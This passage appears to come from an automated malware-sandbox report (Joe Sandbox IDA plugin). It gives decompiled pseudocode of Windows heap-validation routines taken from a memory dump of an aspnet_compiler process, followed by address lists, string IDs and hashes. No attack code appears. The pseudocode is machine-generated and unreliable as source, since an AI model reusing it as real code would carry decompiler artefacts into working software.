                          											_push( *_t300);
                          											__eflags = 0;
                          											E014BA80D(0, 0xd, _t378, 0);
                          										} else {
                          											_t87 = _t415 + 8; // -16
                          											_t406 = _t87;
                          											 *_t406 = _t378;
                          											 *((intOrPtr*)(_t406 + 4)) = _t300;
                          											 *_t300 = _t406;
                          											 *((intOrPtr*)(_t378 + 4)) = _t406;
                          										}
                          										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
                          										_t405 =  *(_t414 + 0xb4);
                          										__eflags = _t405;
                          										if(_t405 == 0) {
                          											L61:
                          											__eflags =  *(_t414 + 0x4c);
                          											if(__eflags != 0) {
                          												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                          												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                          											}
                          											goto L86;
                          										} else {
                          											_t380 =  *_t415 & 0x0000ffff;
                          											while(1) {
                          												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
                          												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
                          													break;
                          												}
                          												_t307 =  *_t405;
                          												__eflags = _t307;
                          												if(_t307 == 0) {
                          													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
                          													L60:
                          													_t94 = _t415 + 8; // -16
                          													E0141E4A0(_t414, _t405, 1, _t94, _t309, _t380);
                          													goto L61;
                          												}
                          												_t405 = _t307;
                          											}
                          											_t309 = _t380;
                          											goto L60;
                          										}
                          									} else {
                          										_t407 =  *(_t414 + 0x4c);
                          										while(1) {
                          											__eflags = _t407;
                          											if(_t407 == 0) {
                          												_t312 =  *(_t378 - 8) & 0x0000ffff;
                          											} else {
                          												_t315 =  *(_t378 - 8);
                          												_t407 =  *(_t414 + 0x4c);
                          												__eflags = _t315 & _t407;
                          												if((_t315 & _t407) != 0) {
                          													_t315 = _t315 ^  *(_t414 + 0x50);
                          													__eflags = _t315;
                          												}
                          												_t312 = _t315 & 0x0000ffff;
                          											}
                          											__eflags = _v28 - (_t312 & 0x0000ffff);
                          											if(_v28 <= (_t312 & 0x0000ffff)) {
                          												goto L51;
                          											}
                          											_t378 =  *_t378;
                          											__eflags = _t414 + 0xc0 - _t378;
                          											if(_t414 + 0xc0 != _t378) {
                          												continue;
                          											}
                          											goto L51;
                          										}
                          										goto L51;
                          									}
                          								}
                          								_t317 = E0141A229(_t414, _t415);
                          								__eflags = _t317;
                          								if(_t317 != 0) {
                          									goto L39;
                          								}
                          								E0141A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
                          								goto L86;
                          							}
                          							_t385 =  *_t415 & 0x0000ffff;
                          							while(1) {
                          								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
                          								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
                          									break;
                          								}
                          								_t320 =  *_t402;
                          								__eflags = _t320;
                          								if(_t320 == 0) {
                          									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
                          									L34:
                          									_t63 = _t415 + 8; // -16
                          									E0141BC04(_t414, _t402, 1, _t63, _t322, _t385);
                          									_t374 = _v24;
                          									goto L35;
                          								}
                          								_t402 = _t320;
                          							}
                          							_t322 = _t385;
                          							goto L34;
                          						}
                          					}
                          					if(_a20 == 0) {
                          						L18:
                          						if(( *(_t415 + 2) & 0x00000004) == 0) {
                          							goto L67;
                          						}
                          						if(E014A23E3(_t414, _t415) == 0) {
                          							goto L117;
                          						}
                          						goto L67;
                          					} else {
                          						if((_t390 & 0x00000002) == 0) {
                          							_t326 =  *(_t415 + 3) & 0x000000ff;
                          						} else {
                          							_t328 = E013F1F5B(_t415);
                          							_t342 = _v20;
                          							_t326 =  *(_t328 + 2) & 0x0000ffff;
                          						}
                          						_t429 = _t326;
                          						if(_t429 == 0) {
                          							goto L18;
                          						}
                          						if(_t429 >= 0) {
                          							__eflags = _t326 & 0x00000800;
                          							if(__eflags != 0) {
                          								goto L18;
                          							}
                          							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
                          							if(__eflags >= 0) {
                          								goto L18;
                          							}
                          							_t412 = _a20;
                          							_t327 = _t326 & 0x0000ffff;
                          							L17:
                          							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
                          							goto L18;
                          						}
                          						_t327 = _t326 & 0x00007fff;
                          						if(_t327 >= 0x81) {
                          							goto L18;
                          						}
                          						_t412 = _a24;
                          						goto L17;
                          					}
                          					L86:
                          				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
                          				_t189 = _v12;
                          				goto L88;
                          			}



































































                          0x014b4af7
                          0x014b4afb
                          0x014b4afd
                          0x014b4b01
                          0x014b4b03
                          0x014b4b08
                          0x014b4b0a
                          0x014b4b0f
                          0x014b4eb5
                          0x014b4eb5
                          0x014b4ebb
                          0x014b50d5
                          0x014b50d8
                          0x014b4ff6
                          0x00000000
                          0x014b4ff6
                          0x014b50de
                          0x014b50e4
                          0x014b50e8
                          0x014b5107
                          0x014b510c
                          0x014b50ea
                          0x014b50ff
                          0x014b5104
                          0x014b5112
                          0x014b5115
                          0x014b5118
                          0x014b5119
                          0x014b50cb
                          0x014b50cb
                          0x014b50af
                          0x00000000
                          0x014b50af
                          0x014b4ecb
                          0x014b50b6
                          0x014b50bb
                          0x014b4ed1
                          0x014b4ee6
                          0x014b4eeb
                          0x014b50c1
                          0x014b50c2
                          0x014b50c5
                          0x014b50c6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014b4b15
                          0x014b4b15
                          0x014b4b1c
                          0x014b4b1e
                          0x014b4b23
                          0x014b4b27
                          0x014b4b33
                          0x014b4b38
                          0x014b4b3a
                          0x014b4b3c
                          0x014b4b41
                          0x014b4b41
                          0x014b4b3a
                          0x014b4b52
                          0x014b5045
                          0x014b504b
                          0x014b504f
                          0x014b506e
                          0x014b5073
                          0x014b5051
                          0x014b5066
                          0x014b506b
                          0x014b5083
                          0x014b5088
                          0x014b5088
                          0x014b508a
                          0x014b5091
                          0x014b5099
                          0x014b5099
                          0x014b509d
                          0x014b50a7
                          0x014b50ad
                          0x014b50ad
                          0x014b50ad
                          0x00000000
                          0x014b509d
                          0x014b4b58
                          0x014b4b5b
                          0x014b4b5e
                          0x014b4b63
                          0x014b4b66
                          0x014b4b69
                          0x014b4b6f
                          0x014b4be4
                          0x014b4bf0
                          0x014b4bf2
                          0x014b4bf5
                          0x014b4dc3
                          0x014b4dc6
                          0x014b4dc9
                          0x014b4dce
                          0x014b4dce
                          0x014b4dd0
                          0x014b4dd0
                          0x014b4dd5
                          0x014b4def
                          0x014b4dd7
                          0x014b4de7
                          0x014b4de7
                          0x014b4df3
                          0x014b5001
                          0x014b5007
                          0x014b500b
                          0x014b502a
                          0x014b502f
                          0x014b500d
                          0x014b5022
                          0x014b5027
                          0x014b5039
                          0x014b503a
                          0x014b503b
                          0x00000000
                          0x014b4df9
                          0x014b4dfd
                          0x014b4e90
                          0x014b4e94
                          0x014b4e9e
                          0x014b4ea4
                          0x014b4ea4
                          0x014b4ea4
                          0x014b4ea6
                          0x014b4ea6
                          0x00000000
                          0x014b4ea6
                          0x014b4e03
                          0x014b4e08
                          0x014b4f88
                          0x014b4f92
                          0x014b4f99
                          0x014b4f9c
                          0x014b4fe0
                          0x014b4fe4
                          0x014b4fee
                          0x014b4ff4
                          0x014b4ff4
                          0x014b4ff4
                          0x00000000
                          0x014b4fe4
                          0x014b4f9e
                          0x014b4fa4
                          0x014b4fa8
                          0x014b4fc7
                          0x014b4fcc
                          0x014b4faa
                          0x014b4fbf
                          0x014b4fc4
                          0x014b4fd2
                          0x014b4fd5
                          0x014b4fd6
                          0x014b4f34
                          0x014b4f34
                          0x00000000
                          0x014b4f39
                          0x014b4e0e
                          0x014b4e14
                          0x014b4e1b
                          0x014b4e25
                          0x014b4e2b
                          0x014b4e2b
                          0x014b4e33
                          0x014b4e38
                          0x014b4e8a
                          0x014b4e8a
                          0x00000000
                          0x014b4e3a
                          0x014b4e3e
                          0x014b4e43
                          0x014b4e47
                          0x014b4e53
                          0x014b4e58
                          0x014b4e5a
                          0x014b4e5c
                          0x014b4e61
                          0x014b4e61
                          0x014b4e5a
                          0x014b4e6e
                          0x014b4f41
                          0x014b4f47
                          0x014b4f4b
                          0x014b4f6a
                          0x014b4f6f
                          0x014b4f4d
                          0x014b4f62
                          0x014b4f67
                          0x014b4f7f
                          0x014b4f80
                          0x014b4f81
                          0x00000000
                          0x014b4e74
                          0x014b4e78
                          0x014b4e82
                          0x014b4e88
                          0x014b4e88
                          0x00000000
                          0x014b4e78
                          0x014b4e6e
                          0x014b4e38
                          0x014b4df3
                          0x014b4bfe
                          0x014b4c01
                          0x014b4c04
                          0x014b4c07
                          0x014b4c09
                          0x014b4c0c
                          0x014b4c0e
                          0x014b4c0e
                          0x014b4c11
                          0x014b4c11
                          0x014b4c0c
                          0x014b4c14
                          0x014b4c17
                          0x014b4dae
                          0x014b4db2
                          0x014b4db7
                          0x014b4dba
                          0x014b4dbd
                          0x014b4ef1
                          0x014b4ef7
                          0x014b4efb
                          0x014b4f1a
                          0x014b4f1f
                          0x014b4efd
                          0x014b4f12
                          0x014b4f17
                          0x014b4f2b
                          0x014b4f2b
                          0x014b4f2d
                          0x014b4f2e
                          0x014b4f2f
                          0x00000000
                          0x014b4f2f
                          0x00000000
                          0x014b4c1d
                          0x014b4c1d
                          0x014b4c20
                          0x014b4c23
                          0x014b4c26
                          0x014b4c29
                          0x014b4c2c
                          0x014b4c2e
                          0x014b4d91
                          0x014b4d91
                          0x014b4d92
                          0x014b4d97
                          0x014b4d9e
                          0x00000000
                          0x014b4d9e
                          0x014b4c34
                          0x014b4c37
                          0x014b4c39
                          0x014b4c3c
                          0x00000000
                          0x00000000
                          0x014b4c45
                          0x014b4c48
                          0x014b4c4e
                          0x014b4c50
                          0x014b4c78
                          0x014b4c78
                          0x014b4c7b
                          0x014b4c7d
                          0x014b4c80
                          0x014b4c84
                          0x014b4cad
                          0x014b4cad
                          0x014b4cb0
                          0x014b4cb8
                          0x014b4cbb
                          0x014b4cbe
                          0x014b4cc1
                          0x014b4cc7
                          0x014b4cdc
                          0x014b4cc9
                          0x014b4cd2
                          0x014b4cd4
                          0x014b4cd4
                          0x014b4cde
                          0x014b4ce0
                          0x014b4d13
                          0x014b4d13
                          0x014b4d16
                          0x014b4d18
                          0x014b4d29
                          0x014b4d2a
                          0x014b4d2c
                          0x014b4d34
                          0x014b4d1a
                          0x014b4d1a
                          0x014b4d1a
                          0x014b4d1d
                          0x014b4d1f
                          0x014b4d22
                          0x014b4d24
                          0x014b4d24
                          0x014b4d3c
                          0x014b4d3f
                          0x014b4d45
                          0x014b4d47
                          0x014b4d6c
                          0x014b4d6c
                          0x014b4d70
                          0x014b4d7e
                          0x014b4d84
                          0x014b4d84
                          0x00000000
                          0x014b4d49
                          0x014b4d49
                          0x014b4d56
                          0x014b4d56
                          0x014b4d59
                          0x00000000
                          0x00000000
                          0x014b4d4e
                          0x014b4d50
                          0x014b4d52
                          0x014b4d8e
                          0x014b4d5d
                          0x014b4d5f
                          0x014b4d67
                          0x00000000
                          0x014b4d67
                          0x014b4d54
                          0x014b4d54
                          0x014b4d5b
                          0x00000000
                          0x014b4d5b
                          0x014b4ce2
                          0x014b4ce2
                          0x014b4ce5
                          0x014b4ce5
                          0x014b4ce7
                          0x014b4cfb
                          0x014b4ce9
                          0x014b4ce9
                          0x014b4cec
                          0x014b4cef
                          0x014b4cf1
                          0x014b4cf3
                          0x014b4cf3
                          0x014b4cf3
                          0x014b4cf6
                          0x014b4cf6
                          0x014b4d02
                          0x014b4d05
                          0x00000000
                          0x00000000
                          0x014b4d07
                          0x014b4d0f
                          0x014b4d11
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014b4d11
                          0x00000000
                          0x014b4ce5
                          0x014b4ce0
                          0x014b4c8a
                          0x014b4c8f
                          0x014b4c91
                          0x00000000
                          0x00000000
                          0x014b4c9d
                          0x00000000
                          0x014b4c9d
                          0x014b4c52
                          0x014b4c5f
                          0x014b4c5f
                          0x014b4c62
                          0x00000000
                          0x00000000
                          0x014b4c57
                          0x014b4c59
                          0x014b4c5b
                          0x014b4caa
                          0x014b4c66
                          0x014b4c68
                          0x014b4c70
                          0x014b4c75
                          0x00000000
                          0x014b4c75
                          0x014b4c5d
                          0x014b4c5d
                          0x014b4c64
                          0x00000000
                          0x014b4c64
                          0x014b4c17
                          0x014b4b75
                          0x014b4bc4
                          0x014b4bc8
                          0x00000000
                          0x00000000
                          0x014b4bd9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014b4b77
                          0x014b4b7a
                          0x014b4b8c
                          0x014b4b7c
                          0x014b4b7e
                          0x014b4b83
                          0x014b4b86
                          0x014b4b86
                          0x014b4b90
                          0x014b4b93
                          0x00000000
                          0x00000000
                          0x014b4b95
                          0x014b4bab
                          0x014b4bb0
                          0x00000000
                          0x00000000
                          0x014b4bb2
                          0x014b4bb9
                          0x00000000
                          0x00000000
                          0x014b4bbb
                          0x014b4bbe
                          0x014b4bc1
                          0x014b4bc1
                          0x00000000
                          0x014b4bc1
                          0x014b4b97
                          0x014b4ba4
                          0x00000000
                          0x00000000
                          0x014b4ba6
                          0x00000000
                          0x014b4ba6
                          0x014b4ea9
                          0x014b4ea9
                          0x014b4eb2
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                          • API String ID: 0-3591852110
                          • Opcode ID: 8903d5f2b4d29e5e593203e75892205229cab451414c63b95e944f6aae91c5cf
                          • Instruction ID: 92e3853be5ad0f0e3d9b19efb4cf8c9b8ce92dfb540effaeca972ac3fac45223
                          • Opcode Fuzzy Hash: 8903d5f2b4d29e5e593203e75892205229cab451414c63b95e944f6aae91c5cf
                          • Instruction Fuzzy Hash: 5812DF702006429FEB25CF69C495BB7BBF5EF04714F18845EE5868B7A2D734E881CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 56%
                          			E014B4496(signed int* __ecx, void* __edx) {
                          				signed int _v5;
                          				signed int _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed char _v24;
                          				signed int* _v28;
                          				char _v32;
                          				signed int* _v36;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t150;
                          				intOrPtr _t151;
                          				signed char _t156;
                          				intOrPtr _t157;
                          				unsigned int _t169;
                          				intOrPtr _t170;
                          				signed int* _t183;
                          				signed char _t184;
                          				intOrPtr _t191;
                          				signed int _t201;
                          				intOrPtr _t203;
                          				intOrPtr _t212;
                          				intOrPtr _t220;
                          				signed int _t230;
                          				signed int _t241;
                          				signed int _t244;
                          				void* _t259;
                          				signed int _t260;
                          				signed int* _t261;
                          				intOrPtr* _t262;
                          				signed int _t263;
                          				signed int* _t264;
                          				signed int _t267;
                          				signed int* _t268;
                          				void* _t270;
                          				void* _t281;
                          				signed short _t285;
                          				signed short _t289;
                          				signed int _t291;
                          				signed int _t298;
                          				signed char _t303;
                          				signed char _t308;
                          				signed int _t314;
                          				intOrPtr _t317;
                          				unsigned int _t319;
                          				signed int* _t325;
                          				signed int _t326;
                          				signed int _t327;
                          				intOrPtr _t328;
                          				signed int _t329;
                          				signed int _t330;
                          				signed int* _t331;
                          				signed int _t332;
                          				signed int _t350;
                          
                          				_t259 = __edx;
                          				_t331 = __ecx;
                          				_v28 = __ecx;
                          				_v20 = 0;
                          				_v12 = 0;
                          				_t150 = E014B49A4(__ecx);
                          				_t267 = 1;
                          				if(_t150 == 0) {
                          					L61:
                          					_t151 =  *[fs:0x30];
                          					__eflags =  *((char*)(_t151 + 2));
                          					if( *((char*)(_t151 + 2)) != 0) {
                          						 *0x14e6378 = _t267;
                          						asm("int3");
                          						 *0x14e6378 = 0;
                          					}
                          					__eflags = _v12;
                          					if(_v12 != 0) {
                          						_t105 =  &_v16;
                          						 *_t105 = _v16 & 0x00000000;
                          						__eflags =  *_t105;
                          						E0142174B( &_v12,  &_v16, 0x8000);
                          					}
                          					L65:
                          					__eflags = 0;
                          					return 0;
                          				}
                          				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
                          					_t268 =  &(_t331[0x30]);
                          					_v32 = 0;
                          					_t260 =  *_t268;
                          					_t308 = 0;
                          					_v24 = 0;
                          					while(_t268 != _t260) {
                          						_t260 =  *_t260;
                          						_v16 =  *_t325 & 0x0000ffff;
                          						_t156 = _t325[0];
                          						_v28 = _t325;
                          						_v5 = _t156;
                          						__eflags = _t156 & 0x00000001;
                          						if((_t156 & 0x00000001) != 0) {
                          							_t157 =  *[fs:0x30];
                          							__eflags =  *(_t157 + 0xc);
                          							if( *(_t157 + 0xc) == 0) {
                          								_push("HEAP: ");
                          								E013FB150();
                          							} else {
                          								E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          							}
                          							_push(_t325);
                          							E013FB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
                          							L32:
                          							_t270 = 0;
                          							__eflags = _t331[0x13];
                          							if(_t331[0x13] != 0) {
                          								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
                          								 *_t325 =  *_t325 ^ _t331[0x14];
                          							}
                          							L60:
                          							_t267 = _t270 + 1;
                          							__eflags = _t267;
                          							goto L61;
                          						}
                          						_t169 =  *_t325 & 0x0000ffff;
                          						__eflags = _t169 - _t308;
                          						if(_t169 < _t308) {
                          							_t170 =  *[fs:0x30];
                          							__eflags =  *(_t170 + 0xc);
                          							if( *(_t170 + 0xc) == 0) {
                          								_push("HEAP: ");
                          								E013FB150();
                          							} else {
                          								E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          							}
                          							E013FB150("Non-Dedicated free list element %p is out of order\n", _t325);
                          							goto L32;
                          						} else {
                          							__eflags = _t331[0x13];
                          							_t308 = _t169;
                          							_v24 = _t308;
                          							if(_t331[0x13] != 0) {
                          								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
                          								 *_t325 =  *_t325 ^ _t331[0x14];
                          								__eflags =  *_t325;
                          							}
                          							_t26 =  &_v32;
                          							 *_t26 = _v32 + 1;
                          							__eflags =  *_t26;
                          							continue;
                          						}
                          					}
                          					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
                          					if( *0x14e6350 != 0 && _t331[0x2f] != 0) {
                          						_push(4);
                          						_push(0x1000);
                          						_push( &_v16);
                          						_push(0);
                          						_push( &_v12);
                          						_push(0xffffffff);
                          						if(E01439660() >= 0) {
                          							_v20 = _v12 + 0x204;
                          						}
                          					}
                          					_t183 =  &(_t331[0x27]);
                          					_t281 = 0x81;
                          					_t326 =  *_t183;
                          					if(_t183 == _t326) {
                          						L49:
                          						_t261 =  &(_t331[0x29]);
                          						_t184 = 0;
                          						_t327 =  *_t261;
                          						_t282 = 0;
                          						_v24 = 0;
                          						_v36 = 0;
                          						__eflags = _t327 - _t261;
                          						if(_t327 == _t261) {
                          							L53:
                          							_t328 = _v32;
                          							_v28 = _t331;
                          							__eflags = _t328 - _t184;
                          							if(_t328 == _t184) {
                          								__eflags = _t331[0x1d] - _t282;
                          								if(_t331[0x1d] == _t282) {
                          									__eflags = _v12;
                          									if(_v12 == 0) {
                          										L82:
                          										_t267 = 1;
                          										__eflags = 1;
                          										goto L83;
                          									}
                          									_t329 = _t331[0x2f];
                          									__eflags = _t329;
                          									if(_t329 == 0) {
                          										L77:
                          										_t330 = _t331[0x22];
                          										__eflags = _t330;
                          										if(_t330 == 0) {
                          											L81:
                          											_t129 =  &_v16;
                          											 *_t129 = _v16 & 0x00000000;
                          											__eflags =  *_t129;
                          											E0142174B( &_v12,  &_v16, 0x8000);
                          											goto L82;
                          										}
                          										_t314 = _t331[0x21] & 0x0000ffff;
                          										_t285 = 1;
                          										__eflags = 1 - _t314;
                          										if(1 >= _t314) {
                          											goto L81;
                          										} else {
                          											goto L79;
                          										}
                          										while(1) {
                          											L79:
                          											_t330 = _t330 + 0x40;
                          											_t332 = _t285 & 0x0000ffff;
                          											_t262 = _v20 + _t332 * 4;
                          											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
                          											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
                          												break;
                          											}
                          											_t285 = _t285 + 1;
                          											__eflags = _t285 - _t314;
                          											if(_t285 < _t314) {
                          												continue;
                          											}
                          											goto L81;
                          										}
                          										_t191 =  *[fs:0x30];
                          										__eflags =  *(_t191 + 0xc);
                          										if( *(_t191 + 0xc) == 0) {
                          											_push("HEAP: ");
                          											E013FB150();
                          										} else {
                          											E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          										}
                          										_push(_t262);
                          										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
                          										_t148 = _t330 + 0x10; // 0x10
                          										_push( *((intOrPtr*)(_t330 + 8)));
                          										E013FB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
                          										L59:
                          										_t270 = 0;
                          										__eflags = 0;
                          										goto L60;
                          									}
                          									_t289 = 1;
                          									__eflags = 1;
                          									while(1) {
                          										_t201 = _v12;
                          										_t329 = _t329 + 0xc;
                          										_t263 = _t289 & 0x0000ffff;
                          										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
                          										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
                          											break;
                          										}
                          										_t289 = _t289 + 1;
                          										__eflags = _t289 - 0x81;
                          										if(_t289 < 0x81) {
                          											continue;
                          										}
                          										goto L77;
                          									}
                          									_t203 =  *[fs:0x30];
                          									__eflags =  *(_t203 + 0xc);
                          									if( *(_t203 + 0xc) == 0) {
                          										_push("HEAP: ");
                          										E013FB150();
                          									} else {
                          										E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          									}
                          									_t291 = _v12;
                          									_push(_t291 + _t263 * 4);
                          									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
                          									_push( *((intOrPtr*)(_t329 + 8)));
                          									E013FB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
                          									goto L59;
                          								}
                          								_t212 =  *[fs:0x30];
                          								__eflags =  *(_t212 + 0xc);
                          								if( *(_t212 + 0xc) == 0) {
                          									_push("HEAP: ");
                          									E013FB150();
                          								} else {
                          									E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          								}
                          								_push(_t331[0x1d]);
                          								_push(_v36);
                          								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
                          								L58:
                          								E013FB150();
                          								goto L59;
                          							}
                          							_t220 =  *[fs:0x30];
                          							__eflags =  *(_t220 + 0xc);
                          							if( *(_t220 + 0xc) == 0) {
                          								_push("HEAP: ");
                          								E013FB150();
                          							} else {
                          								E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          							}
                          							_push(_t328);
                          							_push(_v24);
                          							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
                          							goto L58;
                          						} else {
                          							goto L50;
                          						}
                          						while(1) {
                          							L50:
                          							_t92 = _t327 - 0x10; // -24
                          							_t282 = _t331;
                          							_t230 = E014B4AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
                          							__eflags = _t230;
                          							if(_t230 == 0) {
                          								goto L59;
                          							}
                          							_t327 =  *_t327;
                          							__eflags = _t327 - _t261;
                          							if(_t327 != _t261) {
                          								continue;
                          							}
                          							_t184 = _v24;
                          							_t282 = _v36;
                          							goto L53;
                          						}
                          						goto L59;
                          					} else {
                          						while(1) {
                          							_t39 = _t326 + 0x18; // 0x10
                          							_t264 = _t39;
                          							if(_t331[0x13] != 0) {
                          								_t319 = _t331[0x14] ^  *_t264;
                          								 *_t264 = _t319;
                          								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
                          								_t348 = _t319 >> 0x18 - _t303;
                          								if(_t319 >> 0x18 != _t303) {
                          									_push(_t303);
                          									E014AFA2B(_t264, _t331, _t264, _t326, _t331, _t348);
                          								}
                          								_t281 = 0x81;
                          							}
                          							_t317 = _v20;
                          							if(_t317 != 0) {
                          								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
                          								_t350 = _t241;
                          								if(_t350 != 0) {
                          									if(_t350 >= 0) {
                          										__eflags = _t241 & 0x00000800;
                          										if(__eflags == 0) {
                          											__eflags = _t241 - _t331[0x21];
                          											if(__eflags < 0) {
                          												_t298 = _t241;
                          												_t65 = _t317 + _t298 * 4;
                          												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
                          												__eflags =  *_t65;
                          											}
                          										}
                          									} else {
                          										_t244 = _t241 & 0x00007fff;
                          										if(_t244 < _t281) {
                          											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
                          										}
                          									}
                          								}
                          							}
                          							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E014A23E3(_t331, _t264) == 0) {
                          								break;
                          							}
                          							if(_t331[0x13] != 0) {
                          								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
                          								 *_t264 =  *_t264 ^ _t331[0x14];
                          							}
                          							_t326 =  *_t326;
                          							if( &(_t331[0x27]) == _t326) {
                          								goto L49;
                          							} else {
                          								_t281 = 0x81;
                          								continue;
                          							}
                          						}
                          						__eflags = _t331[0x13];
                          						if(_t331[0x13] != 0) {
                          							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
                          							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
                          						}
                          						goto L65;
                          					}
                          				} else {
                          					L83:
                          					return _t267;
                          				}
                          			}



























































                          0x014b44a1
                          0x014b44a3
                          0x014b44a7
                          0x014b44ac
                          0x014b44af
                          0x014b44b2
                          0x014b44b9
                          0x014b44bc
                          0x014b47f2
                          0x014b47f2
                          0x014b47f8
                          0x014b47fc
                          0x014b47fe
                          0x014b4804
                          0x014b4805
                          0x014b4805
                          0x014b480c
                          0x014b4810
                          0x014b4812
                          0x014b4812
                          0x014b4812
                          0x014b4822
                          0x014b4822
                          0x014b4827
                          0x014b4827
                          0x00000000
                          0x014b4827
                          0x014b44c4
                          0x014b44d3
                          0x014b44d9
                          0x014b44dc
                          0x014b44de
                          0x014b44e0
                          0x014b4560
                          0x014b4520
                          0x014b4522
                          0x014b4525
                          0x014b4528
                          0x014b452b
                          0x014b452e
                          0x014b4530
                          0x014b4697
                          0x014b469d
                          0x014b46a1
                          0x014b46c0
                          0x014b46c5
                          0x014b46a3
                          0x014b46b8
                          0x014b46bd
                          0x014b46cb
                          0x014b46d4
                          0x014b4677
                          0x014b4677
                          0x014b4679
                          0x014b467c
                          0x014b468a
                          0x014b4690
                          0x014b4690
                          0x014b47f1
                          0x014b47f1
                          0x014b47f1
                          0x00000000
                          0x014b47f1
                          0x014b4536
                          0x014b4539
                          0x014b453c
                          0x014b4636
                          0x014b463c
                          0x014b4640
                          0x014b465f
                          0x014b4664
                          0x014b4642
                          0x014b4657
                          0x014b465c
                          0x014b4670
                          0x00000000
                          0x014b4542
                          0x014b4542
                          0x014b4546
                          0x014b4548
                          0x014b454b
                          0x014b4555
                          0x014b455b
                          0x014b455b
                          0x014b455b
                          0x014b455d
                          0x014b455d
                          0x014b455d
                          0x00000000
                          0x014b455d
                          0x014b453c
                          0x014b4579
                          0x014b457c
                          0x014b4587
                          0x014b4589
                          0x014b4591
                          0x014b4592
                          0x014b4597
                          0x014b4598
                          0x014b45a1
                          0x014b45ab
                          0x014b45ab
                          0x014b45a1
                          0x014b45ae
                          0x014b45b4
                          0x014b45b9
                          0x014b45bd
                          0x014b4759
                          0x014b4759
                          0x014b475f
                          0x014b4761
                          0x014b4763
                          0x014b4765
                          0x014b4768
                          0x014b476b
                          0x014b476d
                          0x014b479c
                          0x014b479c
                          0x014b479f
                          0x014b47a2
                          0x014b47a4
                          0x014b4830
                          0x014b4833
                          0x014b4879
                          0x014b487d
                          0x014b48f1
                          0x014b48f3
                          0x014b48f3
                          0x00000000
                          0x014b48f3
                          0x014b487f
                          0x014b4885
                          0x014b4887
                          0x014b48a8
                          0x014b48a8
                          0x014b48ae
                          0x014b48b0
                          0x014b48dc
                          0x014b48dc
                          0x014b48dc
                          0x014b48dc
                          0x014b48ec
                          0x00000000
                          0x014b48ec
                          0x014b48b2
